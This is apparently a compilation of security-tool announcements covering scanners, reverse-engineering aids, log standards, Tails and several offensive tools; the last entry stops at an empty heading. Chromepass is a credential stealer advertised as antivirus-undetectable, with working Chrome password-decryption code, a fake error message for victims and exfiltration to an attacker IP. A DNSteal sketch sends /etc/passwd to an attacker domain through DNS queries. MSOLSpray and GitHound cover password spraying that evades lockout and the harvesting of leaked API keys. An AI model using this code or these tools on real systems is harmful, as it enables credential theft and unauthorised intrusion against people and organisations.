
HikPwn - A Simple Scanner For Hikvision Devices


HikPwn is a simple scanner for Hikvision devices with basic vulnerability scanning capabilities, written in Python 3.8. This project was born out of curiosity while I was capturing and watching network traffic generated by some of Hikvision's software and devices.

Setup instructions:
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt

Tested on:
  • Python 3.8 on Linux 4.19 x86_64

Functions and characteristics:
  • Passive discovery of Hikvision devices.
  • Active discovery and enumeration of Hikvision devices via UDP probing.
Work in progress... stay tuned!
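
For illustration, here is a minimal Python sketch of what a SADP-style active probe can look like. The multicast address, port 37020, and XML probe format are assumptions based on public research into Hikvision's discovery protocol, not code taken from HikPwn:
import socket
import uuid

# Hypothetical SADP-style inquiry probe (format is an assumption)
PROBE = ('<?xml version="1.0" encoding="utf-8"?>'
         '<Probe><Uuid>%s</Uuid><Types>inquiry</Types></Probe>' % str(uuid.uuid4()).upper())

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
sock.bind(('', 37020))  # replies are assumed to arrive on the same port
sock.sendto(PROBE.encode(), ('239.255.255.250', 37020))
try:
    while True:
        data, addr = sock.recvfrom(65535)  # each device answers with an XML description
        print(addr[0], data.decode(errors='replace'))
except socket.timeout:
    pass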

TODO:
  • Add detection and exploitation capabilities for ICSA-17-124-01.

Help:
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active]

HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. by Ananke: https://github.com/4n4nk3.

optional arguments:
  -h, --help             show this help message and exit
  --interface INTERFACE  the network interface to use
  --address ADDRESS      the IP address of the selected network interface
  --active               enable "active" discovery

Censored preview:
Using eth0 as network interface and XXX.XXX.XXX.XXX as its IP address...

[*] Started 30 seconds of both passive and active discovery...

[*] Active discovery's results:

DEVICE #1:
LABEL                   DATA
--------------------------------------------------
Serial Number           xxxxxxxxxxxxxxxxxxxxx
Description             DS-2DE4220IW-D
MAC                     XX-XX-XX-XX-XX-XX
IP                      XXX.XXX.XXX.XX
DHCP in use             false
Software Version        V5.4.3build 160810
DSP Version             V7.3 build 160801
Boot Time               2019-03-01 00:05:33
Activation Status       true
Password Reset Ability  true


[*] Passive discovery didn't find any device.
This project is for educational purposes only. Don't use it for illegal activities. I neither support nor condone illegal or unethical actions, and I can't be held responsible for possible misuse of this software.




Angrgdb - Use Angr Inside GDB - Create An Angr State From The Current Debugger State

Use angr inside GDB. Create an angr state from the current debugger state.

Install
pip install angrgdb
echo "python import angrgdb.commands" >> ~/.gdbinit

Usage
angrgdb implements the angrdbg API in GDB.
You can use it in scripts like this:
from angrgdb import *

gdb.execute("b *0x004005f9")
gdb.execute("r aaaaaaaa")

sm = StateManager()
sm.sim(sm["rax"], 100)

m = sm.simulation_manager()
m.explore(find=0x00400607, avoid=0x00400613)

sm.to_dbg(m.found[0]) #write input to GDB

gdb.execute("x/s $rax")
#0x7fffffffe768: "ais3{I_tak3_g00d_n0t3s}"
gdb.execute("c")
#Correct! that is the secret key!
You can also use angrgdb commands directly in GDB for simple tasks:
  • angrgdb sim <register name> [size] Symbolize a register
  • angrgdb sim <address> [size] Symbolize a memory area
  • angrgdb list List all items that you set as symbolic
  • angrgdb find <address0> <address1> ... <addressN> Set the list of find targets
  • angrgdb avoid <address0> <address1> ... <addressN> Set the list of avoid targets
  • angrgdb reset Reset the context (symbolic values and targets)
  • angrgdb run Generate a state from the debugger state and run the exploration
  • angrgdb shell Open a shell with a StateManager instance created from the current GDB state
  • angrgdb interactive Generate a state from the debugger state and explore by hand using a modified version of angr-cli
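
For reference, the scripted crackme example above could be reproduced interactively with these commands (a sketch of a GDB session, assuming the same breakpoint and find/avoid addresses):
(gdb) break *0x004005f9
(gdb) run aaaaaaaa
(gdb) angrgdb sim rax 100
(gdb) angrgdb find 0x00400607
(gdb) angrgdb avoid 0x00400613
(gdb) angrgdb run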
An example crackme solve using angrgdb+GEF+idb2gdb:


Loading scripts in GDB
If you don't want to use angrgdb from the CLI but prefer a Python script, load the script in GDB with source script.py.

TODO
  • add remote angrdbg like in IDAngr


OSSEM - Open Source Security Events Metadata


The Open Source Security Events Metadata (OSSEM) is a community-led project that focuses primarily on the documentation and standardization of security event logs from diverse data sources and operating systems. Security events are documented in a dictionary format and can be used as a reference for projects like the ThreatHunter-Playbook while mapping data sources to data analytics used to validate the detection of adversarial techniques. In addition, the project provides a common information model (CIM) that can be used by data engineers during data normalization procedures to allow security analysts to query and analyze data across diverse data sources. Finally, the project also provides documentation about the structure and relationships identified in specific data sources to facilitate the development of data analytics.

Goals
  • Define and share a common information model in order to improve the data standardization and transformation of security event logs
  • Define and share data structures and relationships identified in security events logs
  • Provide detailed information in a dictionary format about several security event logs to the community
  • Learn more about security event logs (Windows, Linux & MacOS)
  • Have fun and think more about the data structure in your SIEM when it comes down to detection!!

Project Structure
There are four main folders:
  • Common Information Model (CIM):
    • Facilitates the normalization of data sets by providing a standard way to parse security event logs
    • It is organized by specific entities associated with event logs and defined in more detail by Data Dictionaries
    • The definitions of each entity and its respective field names are mostly general descriptions that could help and expedite event logs parsing procedures.
  • Data Dictionaries:
    • Contains specific information about several security event logs organized by operating system and their respective data sets
    • Each dictionary describes a single event log and its corresponding event field names
    • The difference between the Common Information Model folder and the data dictionaries is that in the CIM the field definitions are more general whereas in a data dictionary, each field name definition is unique to the specific event log.
  • Detection Data Model:
    • Focuses on defining the required data, in the form of data objects and the relationships among them, needed to facilitate the creation of data analytics and validate the detection of adversary techniques
    • This is inspired by the awesome work of MITRE with their project CAR Analytics
    • The information needed for each data object is pulled from the entities defined in the Common Information Model
  • ATT&CK Data Sources:
    • Focuses on the documentation of data sources suggested or associated with techniques defined in the Enterprise Matrix
    • In addition, here is where data sources will be mapped with specific data objects defined in the Detection Data Model part of the project with the main goal of creating a link between techniques, data sources and data analytics
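
To make the CIM idea concrete, here is a hypothetical Python sketch of the kind of normalization the model enables. The raw field names below are real Windows Security 4688 event fields; the standardized names are illustrative, not taken verbatim from OSSEM's dictionaries:
# Map vendor-specific field names onto a common schema (names are illustrative)
SECURITY_4688 = {
    'NewProcessName': 'process_path',
    'NewProcessId': 'process_id',
    'SubjectUserName': 'user_name',
}

def normalize(event, mapping):
    # Rename raw event fields to the common information model names
    return {mapping[k]: v for k, v in event.items() if k in mapping}

raw = {'NewProcessName': 'C:\\Windows\\System32\\cmd.exe',
       'NewProcessId': '0x1f4',
       'SubjectUserName': 'bob'}
print(normalize(raw, SECURITY_4688))
# {'process_path': 'C:\\Windows\\System32\\cmd.exe', 'process_id': '0x1f4', 'user_name': 'bob'}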

Current Status: Alpha
The project is currently in an alpha stage, which means that the content is still changing. We welcome any feedback and suggestions to improve the project.

Projects Using OSSEM
  • HELK currently updating its pipeline configs



DNSteal v2.0 - DNS Exfiltration Tool For Stealthily Sending Files Over DNS Requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Below are a couple of different images showing examples of multiple file transfer and single verbose file transfer:

  • Support for multiple files
  • Gzip compression supported
  • Customisable number of subdomains per query, bytes per subdomain, and filename length

See help below:


If you do not understand the help, then just use the program with default options!
python dnsteal.py 127.0.0.1 -z -v
This one would send 45 bytes per subdomain, of which there are 4 in the query. 15 bytes reserved for filename at the end.
python dnsteal.py 127.0.0.1 -z -v -b 45 -s 4 -f 15
This one would leave no space for filename.
python dnsteal.py 127.0.0.1 -z -v -b 63 -s 4 -f 0
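
To make the -b/-s/-f arithmetic concrete, here is a small Python sketch of the client-side chunking idea. It mirrors the concept only; dnsteal's actual encoding and wire format may differ:
import binascii

def queries(data, fname, bytes_per_label=45, labels_per_query=4):
    # Hex-encode the file and slice it into DNS labels (-b) grouped per query (-s)
    hexed = binascii.hexlify(data).decode()
    step = bytes_per_label * labels_per_query
    for i in range(0, len(hexed), step):
        block = hexed[i:i + step]
        labels = [block[j:j + bytes_per_label] for j in range(0, len(block), bytes_per_label)]
        yield '.'.join(labels) + '.' + fname  # resolving this name leaks the chunk

with open('/etc/passwd', 'rb') as f:
    for q in queries(f.read(), 'passwd.attacker.example'):
        print(q)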


Git-Hound v1.1 - GitHound Pinpoints Exposed API Keys On GitHub Using Pattern Matching, Commit History Searching, And A Unique Result Scoring System


A batch-catching, pattern-matching, patch-attacking secret snatcher.

GitHound pinpoints exposed API keys and other sensitive information on GitHub using pattern matching, commit history searching, and a unique result scoring system. GitHound has earned me over $7,500 in Bug Bounty research. Corporate and Bug Bounty Hunter use cases are outlined below.

Features
  • GitHub/Gist code searching. This enables GitHound to locate sensitive information exposed across all of GitHub, uploaded by any user.
  • Generic API key detection using pattern matching, context, and Shannon entropy.
  • Commit history digging to find improperly deleted sensitive information (for repositories with <6 stars).
  • Scoring system to emphasize confident results, filter out common false positives, and to optimize intensive repo digging.
  • Base64 detection and decoding
  • Options to build GitHound into your workflow, like custom regexes and results-only output mode.

Usage
echo "tillsongalloway.com" | git-hound or git-hound --subdomain-file subdomains.txt

Setup
  1. Download the latest release of GitHound
  2. Create a ./config.yml or ~/.githound/config.yml with your GitHub username and password (2FA accounts are not supported). See config.example.yml.
    1. If it's your first time using the account on the system, you may receive an account verification email.
  3. echo "tillsongalloway.com" | git-hound

Use cases

Corporate: Searching for exposed customer API keys
Knowing the pattern for a specific service's API keys enables you to search GitHub for these keys. You can then pipe matches for your custom key regex into your own script to test the API key against the service and to identify the at-risk account.
echo "api.halcorp.biz" | githound --dig --many-results --regex-file halcorp-api-regexes.txt --results-only | python halapitester.py
For detecting future API key leaks, GitHub offers Push Token Scanning to immediately detect API keys as they are posted.
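
The halapitester.py script above is hypothetical, but a minimal stdin consumer for --results-only output could look like the following Python sketch (the validation endpoint and auth header are assumptions for illustration):
import sys
import requests

for line in sys.stdin:
    key = line.strip()
    if not key:
        continue
    # Assumption: the service returns 200 on some authenticated endpoint for a live key
    r = requests.get('https://api.halcorp.biz/v1/me',
                     headers={'Authorization': 'Bearer ' + key})
    print(('VALID  ' if r.status_code == 200 else 'invalid') + ' ' + key)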

Bug Bounty Hunters: Searching for leaked employee API tokens
My primary use for GitHound is finding sensitive information for Bug Bounty programs. For high-profile targets, the --many-results hack and --languages flag are useful for scraping >100 pages of results.
echo "uberinternal.com" | githound --dig --many-results --languages common-languages.txt --threads 100

Flags
  • --subdomain-file - The file with the subdomains
  • --dig-files - Clone and search the repo's files for results
  • --dig-commits - Clone and search the repo's commit history for results
  • --many-results - Use result sorting and filtering hack to scrape more than 100 pages of results
  • --results-only - Print only regexed results to stdout. Useful for piping custom regex matches into another script
  • --no-repos - Don't search repos
  • --no-gists - Don't search Gists
  • --threads - Specify max number of threads for the commit digger to use.
  • --regex-file - Supply a custom regex file
  • --language-file - Supply a custom file with languages to search.
  • --config-file - Custom config file (default is config.yml)
  • --pages - Max pages to search (default is 100, the page maximum)
  • --no-scoring - Don't use scoring to filter out false positives
  • --no-api-keys - Don't perform generic API key searching. GitHound uses common API key patterns, context clues, and a Shannon entropy filter to find potential exposed API keys.
  • --no-files - Don't flag interesting file extensions
  • --only-filtered - Only search filtered queries (languages)
  • --debug - Print verbose debug messages.

Related tools
  • GitRob is an excellent tool that specifically targets an organization or user's repositories for exposed credentials and displays them on a beautiful web interface.


MSOLSpray - A Password Spraying Tool For Microsoft Online Accounts (Azure/O365)


A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!

Why another spraying tool?
Yes, I realize there are other password spraying tools for O365/Azure. The main difference is that this tool not only looks for valid passwords, but also captures the extremely verbose information that Azure AD error codes give you. These error codes indicate whether MFA is enabled on the account, whether a tenant doesn't exist, whether a user doesn't exist, whether the account is locked or disabled, whether the password is expired, and much more.
So this doubles as not only a password spraying tool but also a Microsoft Online recon tool that provides account/domain enumeration. In limited testing, it appears that a valid login to the Microsoft Online OAuth2 endpoint doesn't auto-trigger MFA texts/push notifications, making this really useful for finding valid creds without alerting the target.
Lastly, this tool works well with FireProx to rotate source IP addresses on authentication requests. In testing this appeared to avoid getting blocked by Azure Smart Lockout.
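
To illustrate the error-code triage idea, here is a Python sketch against the public OAuth2 token endpoint. The AADSTS code meanings are from Microsoft's documentation; the endpoint, parameters, and client id are assumptions for illustration (MSOLSpray itself is PowerShell and handles more cases):
import requests

CODES = {
    'AADSTS50126': 'invalid password (user exists)',
    'AADSTS50076': 'valid credentials, MFA required',
    'AADSTS50053': 'account locked (smart lockout)',
    'AADSTS50057': 'account disabled',
    'AADSTS50034': 'user does not exist',
    'AADSTS90002': 'tenant does not exist',
}

def try_login(user, password):
    r = requests.post(
        'https://login.microsoft.com/common/oauth2/token',
        data={'grant_type': 'password', 'resource': 'https://graph.windows.net',
              'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',  # well-known Azure AD PowerShell client id
              'username': user, 'password': password})
    if r.status_code == 200:
        return 'VALID credentials'
    err = r.json().get('error_description', '')
    return next((v for k, v in CODES.items() if k in err), 'unknown failure')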

Quick Start

You will need a userlist file with target email addresses one per line. Open a PowerShell terminal from the Windows command line with 'powershell.exe -exec bypass'.
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020

Invoke-MSOLSpray Options
UserList - File of usernames, one per line, in the format "user@domain.com"
Password - A single password that will be used to perform the password spray.
OutFile - A file to output valid results to.
Force - Forces the spray to continue and not stop when multiple account lockouts are detected.
URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.


Tails 4.5 - Live System to Preserve Your Privacy and Anonymity


The Tails team is happy to publish Tails 4.5, the first version of Tails to support Secure Boot.
This release also fixes many security vulnerabilities. You should upgrade as soon as possible.

New features

Secure Boot

Tails now starts on computers with Secure Boot enabled.
If your Mac displays the following error:
Security settings do not allow this Mac to use an external startup disk.
then change the settings in your Mac's Startup Security Utility to authorize starting from Tails.

Changes and updates

  • Update Tor Browser to 9.0.9.
    This update fixes several vulnerabilities in Firefox, including some critical ones.
    Mozilla is aware of targeted attacks in the wild abusing these vulnerabilities.

Known issues

None specific to this release.
See the list of long-standing issues.

Get Tails 4.5

To upgrade your Tails USB stick and keep your persistent storage

  • Automatic upgrades are available from Tails 4.2 or later to 4.5.
  • If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.

To install Tails on a new USB stick

Follow our installation instructions:
All the data on this USB stick will be lost.




Tentacle - A POC Vulnerability Verification And Exploit Framework


Tentacle is a POC vulnerability verification and exploit framework. It supports free extension of exploits through POC scripts, and it can call the ZoomEye, FOFA, Shodan and other APIs to perform bulk vulnerability verification against multiple targets. (Still in DEV...)

Install
pip3 install -r requestment.txt

Usage
When you run it for the first time, the configuration file conf/tentacle.conf will be generated automatically.
# Show help for tentacle.
python3 tentacle.py --help

# Show all modules; you can find them under the `script` path.
python3 tentacle.py --show

# Show all functions of a module with -f show or -f help
python3 tentacle.py -m script/web/web_status -f show
python3 tentacle.py -m script/web/web_status -f help

# Load target by iS/iN/iF/iT/iX/iE/gg/sd/ze/ff.
# Scan port and then it will try to send the poc.
python3 tentacle.py -m script/web/web_status -iS www.examples.com # Load target by url or host
python3 tentacle.py -m script/web/web_status -iN 192.168.111.0/24 # Load target by network
python3 tentacle.py -m script/web/web_status -iF target.txt # Load target by file
python3 tentacle.py -m script/web/web_status -iT dcc54c3e1cc2c2e1 # Load targets from a previous record
python3 tentacle.py -m script/web/web_status -iX nmap_xml.xml # Load target by nmap.xml
python3 tentacle.py -m script/web/web_status -iE "powered by discuz" # Load target by baidu/bing/360so
python3 tentacle.py -m script/web/web_status -gg 'intext:powered by discuz' # Load target by google api
python3 tentacle.py -m script/web/web_status -sd 'apache' # Load target by shodan api
python3 tentacle.py -m script/web/web_status -ze 'app:weblogic' # Load target by zoomeye api
python3 tentacle.py -m script/web/web_status -ff 'domain="example.com"' # Load target by fofa api

# Load modules with -m (e.g. script/info/web_status,@web)
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status # Load web_status module
python3 tentacle.py -iS 127.0.0.1 -m @web # Load all module of web path
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status,@web # Load all module of web path and web_status module
python3 tentacle.py -iS 127.0.0.1 -m "*" # Load all module of script path

# Set port scan scope
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status # Scan the top 150 ports, then perform bulk vulnerability verification against multiple targets.
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -sP # Skip the port scan and try each module's default service port
python3 tentacle.py -iS 127.0.0.1 -m script/web/web_status -lP 80-90,443 # Scan 80-90 ports and 443 port and then perform bulk vulnerability verification for multiple targets.

# Use a function of a module with -m and -f (e.g. -m web_status -f prove); make sure the function exists in the module.
python3 tentacle.py -m script/web/web_status -f prove

# Show task's result by -tS
python3 tentacle.py -tS 8d4b37597aaec25e

# Export task's result by -tS to test.xlsx
python3 tentacle.py -tS 8d4b37597aaec25e -o test

# Update by git
python3 tentacle.py --update

Update
  • [2018-11-15] Code refactoring and bug fixes.
  • [2019-06-08] Code refactoring and added port scanning.
  • [2020-03-15] Code refactoring and added scripts.

Thanks
  1. Sqlmap
  2. POC-T


Chromepass - Hacking Chrome Saved Passwords


Chromepass is a python-based console application that generates a windows executable with the following features:
  • Decrypt Chrome saved passwords
  • Send a file with the login/password combinations remotely (email or reverse-http)
  • Custom icon
  • Completely undetectable by AntiVirus Engines
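
For context, here is a rough Python sketch of the classic technique for decrypting Chrome saved passwords on Windows (the pre-Chrome-80 DPAPI scheme; newer versions instead wrap an AES-GCM key in the "Local State" file). This illustrates the general approach only and is not Chromepass's code:
import os, shutil, sqlite3
import win32crypt  # pip install pywin32

login_data = os.path.join(os.environ['LOCALAPPDATA'],
                          r'Google\Chrome\User Data\Default\Login Data')
shutil.copy2(login_data, 'LoginData.db')  # copy, because Chrome locks the live database

db = sqlite3.connect('LoginData.db')
for url, user, blob in db.execute(
        'SELECT origin_url, username_value, password_value FROM logins'):
    # CryptUnprotectData returns (description, plaintext); works for the current user
    password = win32crypt.CryptUnprotectData(blob, None, None, None, 0)[1]
    print(url, user, password.decode(errors='replace'))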

AV Detection!
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed using a variety of websites:
  • VirusTotal Scan (0/68) 30-09-2019
    • this is an educational project, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
  • AntiScan (0/26) 24-09-2019
  • Hybrid Analysis All Clean (CrowdStrike Falcon, MetaDefender and VirusTotal) 24-09-2019

Getting started

Dependencies and Requirements
This is a very simple application, which uses only:
  • Python - Only tested on 3.7.4 but should work in 3.6+

Installation
Chromepass requires Python 3.6+ to run.
Install the dependencies:
> cd chromepass
> pip install -r requirements.txt
If any errors occur, make sure you're running on the proper environment (if applicable) and that you have Python 3.6+ (preferably 3.7.4). If the errors persist, try:
> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt

Usage
Chromepass is very straightforward. Start by running:
> python create_server.py
It will ask you to select between two options:
  • (1) via email [To be fixed]
    • This will ask you for an email address and a password
    • It will then ask you if you wish to send to another address or to yourself
    • Next, you're asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable, after the passwords have been transferred.
    • You can then write your own message or leave it blank
    • You're done! Wait for the executable to be generated and then it's ready.
  • (2) via client.exe [Recommended at the moment]
    • First you're asked to input an IP Address for a reverse connection. This is the address that belongs to the attacker. It can be a local IP address or a remote IP Address. If a remote address is chosen, Port Forwarding needs to be in place.
    • You're then asked if you want to display an error message. This is a fake message that if enabled will appear when the victim opens the executable, after the passwords have been transferred.
    • You can then write your own message or leave it blank
    • You're done! Wait for the executables to be generated and then it's ready.
    • The client.exe must be started before the server_ip.exe. The server_ip.exe is the file the victim receives.
  • Note: To set a custom icon, replace icon.ico by the desired icon with the same name and format.

Todo
  • Sending Real-time precise location of the victim (completed, releases next update)
  • Also steal Firefox passwords (Completed, releases next update)
  • Option of installing a backdoor allowing remote control of the victim's computer (completed, releases next update)
  • Support for more email providers (in progress)
  • Also steal passwords from other programs, such as keychains(in progress)
  • Add Night Mode (in progress)

Errors, Bugs and feature requests
If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.
Please follow the templates shown when creating the issue.

Learn More
For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking
If you wish to contact me, you can do so via: marionascimento@itsec.us

Disclaimer
I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.


Richkit - Domain Enrichment Toolkit


Richkit is a Python 3 package that provides tools which take a domain name as input and return additional information on that domain. That information can be an analysis of the domain itself, looked up from databases, retrieved from other services, or some combination thereof.
The purpose of richkit is to provide a reusable library of domain name-related analysis, lookup, and retrieval functions that are shared within the Network Security research group at Aalborg University, and also available to the public for reuse and modification.
Documentation can be found at https://richkit.readthedocs.io/en/latest/.

Requirements
  • Python >= 3.5

Installation
To install richkit, just type pip install richkit in the terminal.

Usage
The following snippets retrieve the TLD and the URL category, respectively.
  • Retrieving the effective top level domain of a given url:
    >>> from richkit.analyse import tld
    >>> urls = ["www.aau.dk","www.github.com","www.google.com"]
    >>>
    >>> for url in urls:
    ...     print(tld(url))
    dk
    com
    com
  • Retrieving the category of a given url:
    >>> from richkit.retrieve.symantec import fetch_from_internet
    >>> from richkit.retrieve.symantec import LocalCategoryDB
    >>>
    >>> urls = ["www.aau.dk","www.github.com","www.google.com"]
    >>>
    >>> local_db = LocalCategoryDB()
    >>> for url in urls:
    ...     url_category = local_db.get_category(url)
    ...     if url_category == '':
    ...         url_category = fetch_from_internet(url)
    ...     print(url_category)
    Education
    Technology/Internet
    Search Engines/Portals

Modules
Richkit defines a set of functions categorized by the following modules:
  • richkit.analyse: This module provides functions that can be applied to a domain name. Similarly to richkit.lookup, and in contrast to richkit.retrieve, this is done without disclosing the domain name to third parties and breaching confidentiality.
  • richkit.lookup: This module provides the ability to look up domain names in local resources, i.e. the domain name cannot be sent off to third parties. The module might fetch resources, such as lists or databases, but this must be done in a way that keeps the domain name confidential. Contrast this with richkit.retrieve.
  • richkit.retrieve: This module provides the ability to retrieve data on domain names of any sort. It comes without the "confidentiality contract" of richkit.lookup.



Eavesarp - Analyze ARP Requests To Identify Intercommunicating Hosts And Stale Network Address Configurations (SNACs)


A reconnaissance tool that analyzes ARP requests to identify hosts that are likely communicating with one another, which is useful in those dreaded situations where LLMNR/NBNS aren't in use for name resolution.

Requirements/Installation
This is only gon' work on Kali or other Debian-based Linux distributions
eavesarp requires Python 3.7 and Scapy. After installing Python, run the following to install Scapy: python3.7 -m pip install -r requirements.txt

General Usage

Capturing ARP Requests
Notes:
  • eavesarp requires root privileges to sniff from the interface and craft ARP packets.
  • Captured output is automatically written to disk under the name eavesarp.db to prevent having to recapture ARP requests.

Passive Execution
The most basic form of execution is:
sudo ./eavesarp.py capture -i eth1
This will initialize eavesarp such that ARP requests will be captured, analyzed, and relevant output will be presented to the user in a table. Use --help for additional information on non-standard arguments. Note that the stale column indicates [UNCONFIRMED] when an ARP request originating from a target (as a sender) has not yet been observed when running in this mode. Enable ARP resolution via the -ar flag to determine if a given target address has gone stale.
 ___ ___ __  _____ ___ ___ ________
/ -_) _ `/ |/ / -_|_-</ _ `/ __/ _ \
\__/\_,_/|___/\__/___/\_,_/_/ / .__/
-----------------------------/ /---
[LISTEN CAREFULLY] /_/

Capture interface: eth1
ARP resolution: disabled
DNS resolution: disabled
Requests analyzed: 65

SNAC    Sender         Target          ARP#  Stale
------  -------------  --------------  ----  -------------
        192.168.86.5   192.168.86.101  29    [UNCONFIRMED]
                       192.168.86.3    1
        192.168.86.3   192.168.86.37   25    [UNCONFIRMED]
                       192.168.86.38   7     [UNCONFIRMED]
                       192.168.86.5    1
                       192.168.86.99   1
        192.168.86.99  192.168.86.3    1

Active Execution (ARP Resolution, DNS Resolution)
Enable ARP and DNS resolution by including the -ar and -dr flags. Keep in mind that this makes the tool non-passive, but the advantage is that DNS records, MAC addresses, and a confirmation of SNACs status is returned.
sudo ./eavesarp.py capture -i eth1 -ar -dr --blacklist 192.168.86.5
We can clearly see from the output below which senders are affected by one or more SNACs and the affected addresses. The final column indicates if a potential MITM opportunity is present. eavesarp checks whether the forward (FWD) address of the PTR record resolved for a given sender differs from the target IP. If so, it may be an indicator that the intended target has moved to the new FWD address. Applying an alias to the interface of our attacking host may allow us to forward the traffic to the intended target and capture information in transit.
 ___ ___ __  _____ ___ ___ ________
/ -_) _ `/ |/ / -_|_-</ _ `/ __/ _ \
\__/\_,_/|___/\__/___/\_,_/_/ / .__/
-----------------------------/ /---
[LISTEN CAREFULLY] /_/

Capture interface: eth1
ARP resolution: enabled
DNS resolution: enabled
Requests analyzed: 55

SNAC  Sender         Target          ARP#  Stale  Sender PTR      Target PTR        MITM
----  -------------  --------------  ----  -----  --------------  ----------------  ---------------------------------------------
True  192.168.86.2   192.168.86.101  21    True   iron.aa.local.  syslog.aa.local.  T-IP:192.168.86.101 != PTR-FWD:192.168.86.102
True  192.168.86.3   192.168.86.38   17    True   crux.aa.local.
                     192.168.86.37   15    True
                     192.168.86.99   1                            w10.aa.local.
      192.168.86.99  192.168.86.3    1            w10.aa.local.   crux.aa.local.
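
The PTR/forward-lookup check described above can be sketched with dnspython (an illustration of the concept; eavesarp's own implementation may differ):
import dns.resolver
import dns.reversename

def check(target_ip):
    # Resolve the PTR for the target IP, then the forward (A) record of that name
    ptr = dns.resolver.resolve(dns.reversename.from_address(target_ip), 'PTR')[0].to_text()
    fwd = dns.resolver.resolve(ptr, 'A')[0].to_text()
    if fwd != target_ip:
        print('T-IP:%s != PTR-FWD:%s' % (target_ip, fwd))  # potential MITM opportunity

check('192.168.86.101')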

Analyzing PCAP Files and SQLite Databases (generated by eavesarp)
eavesarp can accept SQLite databases and PCAP files for analysis. It will output the extracted values to a new database file for further analysis. See the --help flag for more information on this process; however, basic execution is demonstrated below.
sudo ./eavesarp.py analyze -sfs eavesarp.db  -cp disable --blacklist 192.168.86.5 --csv-output-file eavesarp_analysis.db
SNAC  Sender         Target          ARP#  Stale  Sender PTR      Target PTR        MITM
----  -------------  --------------  ----  -----  --------------  ----------------  ---------------------------------------------
True  192.168.86.2   192.168.86.101  21    True   iron.aa.local.  syslog.aa.local.  T-IP:192.168.86.101 != PTR-FWD:192.168.86.102
True  192.168.86.3   192.168.86.38   17    True   crux.aa.local.
                     192.168.86.37   15    True
                     192.168.86.99   1                            w10.aa.local.
      192.168.86.99  192.168.86.3    1            w10.aa.local.   crux.aa.local.
- Writing csv output to eavesarp_analysis.db
...and the CSV output looks like...
arp_count,sender,sender_mac,target,target_mac,stale,sender_ptr,target_ptr,target_forward,mitm_op,snac
21,192.168.86.2,74:d4:35:1a:b5:fb,192.168.86.101,[STALE TARGET],True,iron.aa.local.,syslog.aa.local.,192.168.86.102,T-IP:192.168.86.101 != PTR-FWD:192.168.86.102,True
17,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.38,[STALE TARGET],True,crux.aa.local.,,,False,True
15,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.37,[STALE TARGET],True,crux.aa.local.,,,False,True
1,192.168.86.99,08:00:27:22:49:c5,192.168.86.3,b8:27:eb:a9:5c:8f,False,w10.aa.local.,crux.aa.local.,192.168.86.3,False,False
1,192.168.86.3,b8:27:eb:a9:5c:8f,192.168.86.99,08:00:27:22:49:c5,False,crux.aa.local.,w10.aa.local.,192.168.86.99,False,True


Ps-Tools - An Advanced Process Monitoring Toolkit For Offensive Operations


Having a good technical understanding of the systems we land on during an engagement is a key condition for deciding what is going to be the next step within an operation. Collecting and analysing data of running processes from compromised systems gives us a wealth of information and helps us to better understand how the IT landscape from a target organisation is setup. Moreover, periodically polling process data allows us to react on changes within the environment or provide triggers when an investigation is taking place.
To be able to collect detailed process data from compromised end-points we wrote a collection of process tools which brings the power of these advanced process utilities to C2 frameworks (such as Cobalt Strike).

More info about the tools and used techniques can be found on the following Blog: https://outflank.nl/blog/2020/03/11/red-team-tactics-advanced-process-monitoring-techniques-in-offensive-operations/

The following functionality is included in the toolkit:
Psx: Shows a detailed list of all processes running on the system.
Psk: Shows detailed kernel information including loaded driver modules.
Psc: Shows a detailed list of all processes with Established TCP connections.
Psm: Show detailed module information for a specific process id (e.g. loaded modules, network connections).
Psh: Show detailed handle information for a specific process id (e.g. object handles, network connections).
Psw: Show Window titles from processes with active Windows.

Usage:
Download the Outflank-Ps-Tools folder and load the Ps-Tools.cna script within the Cobalt Strike Script Manager.
Use the Beacon help command to display syntax information.
This project is written in C/C++. You can use Visual Studio to compile the reflective DLLs from source.

Credits
Author: Cornelis de Plaa (@Cneelis) / Outflank
Shout out to: Stan Hegt (@StanHacked) and all my other great colleagues at Outflank


Lunar - A Lightweight Native DLL Mapping Library That Supports Mapping Directly From Memory


A lightweight native DLL mapping library that supports mapping directly from memory

Features
  • Imports and delay imports are resolved
  • Relocations are performed
  • Image sections are mapped with the correct page protection
  • Exception handlers are initialised
  • A security cookie is generated and initialised
  • DLL entry point and TLS callbacks are called

Getting started
The example below demonstrates a simple implementation of the library
var libraryMapper = new LibraryMapper(process, dllBytes);

// Map the DLL into the process

libraryMapper.MapLibrary();

// Unmap the DLL from the process

libraryMapper.UnmapLibrary();

Constructors
LibraryMapper(Process, Memory<byte>)
Provides the functionality to map a DLL from memory into a remote process
LibraryMapper(Process, string)
Provides the functionality to map a DLL from disk into a remote process

Properties
DllBaseAddress
The base address of the DLL in the remote process after it has been mapped

Methods
MapLibrary()
Maps the DLL into the remote process
UnmapLibrary()
Unmaps the DLL from the remote process

Caveats
